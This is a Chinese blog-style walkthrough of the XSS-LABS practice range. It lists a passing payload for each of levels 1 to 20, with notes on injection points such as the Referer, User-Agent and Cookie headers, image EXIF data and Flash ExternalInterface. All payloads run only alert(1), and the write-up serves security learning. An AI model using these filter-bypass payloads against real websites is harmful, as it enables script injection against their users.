XSS - LABS —— 靶场笔记合集

2024-08-29 04:20
文章标签 笔记 靶场 合集 xss labs

本文主要是介绍XSS - LABS —— 靶场笔记合集,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

0x01:XSS LABS 靶场初识

  • 0x01:XSS LABS 靶场初识

0x02:XSS LABS 过关思路

  • 0x0201:XSS LABS - Level 1 过关思路
    • Pass Payload:<script>alert(1)</script>
  • 0x0202:XSS LABS - Level 2 过关思路
    • Pass Payload:"><script>alert(1)</script>
  • 0x0203:XSS LABS - Level 3 过关思路
    •  Pass Payload:' onmousemove='alert(1)
    •  备注:htmlspecialchars() 函数在 PHP 8 中默认过滤掉单双引号,可能导致攻击无效。
  • 0x0204:XSS LABS - Level 4 过关思路
    •  Pass Payload:" onmouseover="alert(1)
  • 0x0205:XSS LABS - Level 5 过关思路
    • Pass Payload:"><a href="javascript:alert(1)
    • Pass Payload:"><iframe src=javascript:alert(1); width="0px" height="0px"></iframe><input hidden style="text
  • 0x0206:XSS LABS - Level 6 过关思路
    • Pass Payload:"><ScRiPt>alert(1)</ScRiPt><input hidden value="
  • 0x0207:XSS LABS - Level 7 过关思路
    • Pass Payload:" oonnmouseover="alert(1)
  • 0x0208:XSS LABS - Level 8 过关思路
    • Pass Payload:java&#x0073;cript:alert(1)
  • 0x0209:XSS LABS - Level 9 过关思路
    • Pass Payload:java&#115;cript:alert('http://')
  • 0x0210:XSS LABS - Level 10 过关思路
    • Pass Payload:?t_sort=" onmousemove="alert(1)" type="
  • 0x0211:XSS LABS - Level 11 过关思路
    • Pass Payload:" type="text" onmouseover="alert(1)
    • 备注:注入点在 HTTP 请求包的 Referer 字段上,找准注入参数很重要。
  • 0x0212:XSS LABS - Level 12 过关思路
    • Pass Payload:" type="text" onmouseover="alert(1)
    • 备注:注入点在 HTTP 请求包的 User-Agent 字段上。
  • 0x0213:XSS LABS - Level 13 过关思路
    • Pass Payload:" type="text" onmouseover="alert(1)
    • 备注:注入点在 HTTP 请求包的 Cookie 字段的 user 参数中。
  • 0x0214:XSS LABS - Level 14 过关思路
    • Pass Payload:<script>alert(1)</script>
    • 备注:本关需要通过修改图片的 EXIF 信息完成 XSS 攻击。
  • 0x0215:XSS LABS - Level 15 过关思路
    • Pass Payload:<a href="" onmouseover="alert(1)">
    • 备注:本关需要修改图片内容,将 Payload 携带进图片后,再通过 Angular JS 包含图片进行攻击。
  • 0x0216:XSS LABS - Level 16 过关思路
    • Pass Payload:<input%0atype="text"%0aonmouseover="alert(1)">
    • 备注:在 HTML 中,什么东西与空格等价?
  • 0x0217:XSS LABS - Level 17 过关思路
    • Pass Payload:?arg01=%20onmouseover&arg02=alert(1)
    • 备注:使用 Google 浏览器过关。
  • 0x0218:XSS LABS - Level 18 过关思路
    • Pass Payload:?arg01= onmouseover&arg02=alert(1)
    • 备注:使用 Google 浏览器过关。
  • 0x0219:XSS LABS - Level 19 过关思路
    • Pass Payload:?arg01=version&arg02=<a href='javascript:alert(1)'>Test</a>
    • 备注:本关考察了 Flash XSS,需要使用 JPEXS 对 .swf 文件进行逆向。
  • 0x0220:XSS LABS - Level 20 过关思路
    • Pass Payload:?arg01=id&arg02=id\"));} catch (e) {alert(1);}//%26width=123%26height=123
    • 备注:本关考察了 Flash XSS 中的 ExternalInterface.call 函数,需要掌握该函数在 JS 中的实际运行方式。

这篇关于XSS - LABS —— 靶场笔记合集的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1116830

相关文章

【专题】2024飞行汽车技术全景报告合集PDF分享(附原数据表)

原文链接: https://tecdat.cn/?p=37628 6月16日,小鹏汇天旅航者X2在北京大兴国际机场临空经济区完成首飞,这也是小鹏汇天的产品在京津冀地区进行的首次飞行。小鹏汇天方面还表示,公司准备量产,并计划今年四季度开启预售小鹏汇天分体式飞行汽车,探索分体式飞行汽车城际通勤。阅读原文,获取专题报告合集全文,解锁文末271份飞行汽车相关行业研究报告。 据悉,业内人士对飞行汽车行业

【学习笔记】 陈强-机器学习-Python-Ch15 人工神经网络(1)sklearn

系列文章目录 监督学习:参数方法 【学习笔记】 陈强-机器学习-Python-Ch4 线性回归 【学习笔记】 陈强-机器学习-Python-Ch5 逻辑回归 【课后题练习】 陈强-机器学习-Python-Ch5 逻辑回归(SAheart.csv) 【学习笔记】 陈强-机器学习-Python-Ch6 多项逻辑回归 【学习笔记 及 课后题练习】 陈强-机器学习-Python-Ch7 判别分析 【学

系统架构师考试学习笔记第三篇——架构设计高级知识(20)通信系统架构设计理论与实践

本章知识考点:         第20课时主要学习通信系统架构设计的理论和工作中的实践。根据新版考试大纲,本课时知识点会涉及案例分析题(25分),而在历年考试中,案例题对该部分内容的考查并不多,虽在综合知识选择题目中经常考查,但分值也不高。本课时内容侧重于对知识点的记忆和理解,按照以往的出题规律,通信系统架构设计基础知识点多来源于教材内的基础网络设备、网络架构和教材外最新时事热点技术。本课时知识

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

EasyPlayer.js网页H5 Web js播放器能力合集

最近遇到一个需求,要求做一款播放器,发现能力上跟EasyPlayer.js基本一致,满足要求: 需求 功性能 分类 需求描述 功能 预览 分屏模式 单分屏(单屏/全屏) 多分屏(2*2) 多分屏(3*3) 多分屏(4*4) 播放控制 播放(单个或全部) 暂停(暂停时展示最后一帧画面) 停止(单个或全部) 声音控制(开关/音量调节) 主辅码流切换 辅助功能 屏

论文阅读笔记: Segment Anything

文章目录 Segment Anything摘要引言任务模型数据引擎数据集负责任的人工智能 Segment Anything Model图像编码器提示编码器mask解码器解决歧义损失和训练 Segment Anything 论文地址: https://arxiv.org/abs/2304.02643 代码地址:https://github.com/facebookresear

数学建模笔记—— 非线性规划

数学建模笔记—— 非线性规划 非线性规划1. 模型原理1.1 非线性规划的标准型1.2 非线性规划求解的Matlab函数 2. 典型例题3. matlab代码求解3.1 例1 一个简单示例3.2 例2 选址问题1. 第一问 线性规划2. 第二问 非线性规划 非线性规划 非线性规划是一种求解目标函数或约束条件中有一个或几个非线性函数的最优化问题的方法。运筹学的一个重要分支。2

【C++学习笔记 20】C++中的智能指针

智能指针的功能 在上一篇笔记提到了在栈和堆上创建变量的区别,使用new关键字创建变量时,需要搭配delete关键字销毁变量。而智能指针的作用就是调用new分配内存时,不必自己去调用delete,甚至不用调用new。 智能指针实际上就是对原始指针的包装。 unique_ptr 最简单的智能指针,是一种作用域指针,意思是当指针超出该作用域时,会自动调用delete。它名为unique的原因是这个

查看提交历史 —— Git 学习笔记 11

查看提交历史 查看提交历史 不带任何选项的git log-p选项--stat 选项--pretty=oneline选项--pretty=format选项git log常用选项列表参考资料 在提交了若干更新,又或者克隆了某个项目之后,你也许想回顾下提交历史。 完成这个任务最简单而又有效的 工具是 git log 命令。 接下来的例子会用一个用于演示的 simplegit

记录每次更新到仓库 —— Git 学习笔记 10

记录每次更新到仓库 文章目录 文件的状态三个区域检查当前文件状态跟踪新文件取消跟踪(un-tracking)文件重新跟踪(re-tracking)文件暂存已修改文件忽略某些文件查看已暂存和未暂存的修改提交更新跳过暂存区删除文件移动文件参考资料 咱们接着很多天以前的 取得Git仓库 这篇文章继续说。 文件的状态 不管是通过哪种方法,现在我们已经有了一个仓库,并从这个仓